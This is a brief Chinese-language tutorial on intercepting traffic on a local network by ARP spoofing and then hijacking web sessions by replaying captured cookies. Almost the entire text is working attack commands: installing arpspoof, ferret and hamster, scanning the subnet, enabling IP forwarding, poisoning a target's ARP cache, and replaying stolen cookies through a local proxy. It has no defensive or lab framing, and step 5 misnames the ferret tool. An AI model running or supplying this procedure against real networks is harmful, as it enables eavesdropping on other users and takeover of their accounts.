ARP欺骗+cookie会话劫持
一.环境搭建
1.下载arpspoof
apt install dsniff
2.下载ferret
dpkg --add-architecture i386
apt-get clean
apt-get update
sudo apt install ferret-sidejack:i386
3.下载hamster
wget http://http.kali.org/pool/main/h/hamster-sidejack/hamster-sidejack_2.0-1kali4_amd64.deb
dpkg -i hamster-sidejack_2.0-1kali4_amd64.deb
二.开始ARP欺骗
1.查找目标机
ifconfig #查看自己的网卡,IP和网关
nmap -sP 网关/24 #查看局域网内的所有IP并记住一个目标机的IP
这里我的网关为192.168.0.1,目标IP为192.168.0.66,之后不再提起
2.开启流量转发
cat /proc/sys/net/ipv4/ip_forward # 查看流量转发是否打开,0是未打开,1是打开
# 如果流量转发未打开,则输入下面的命令打开
echo 1 > /proc/sys/net/ipv4/ip_forward
3.开始ARP欺骗
arpspoof -i 网卡 -t 网关 目标机IP
# 我的命令为arpspoof -i eth0 -t 192.168.0.1 192.168.0.66
4.开始抓包
我这里使用wireshark抓包。
注意 保存时选择pacp文件格式,保存不要在root目录,否则ferret工具无法写入。
5.freeter工具重写
切换到pacp文件目录
freeter -r pacp文件 -w hamster.txt
==将生成的hamster.txt移动到root文件夹下
mv hamster.txt /root
6.hamster重放
启动hamster工具
hamster
7.开启浏览器代理
然后登录网页http://127.0.0.1:1234或者http://hamster即可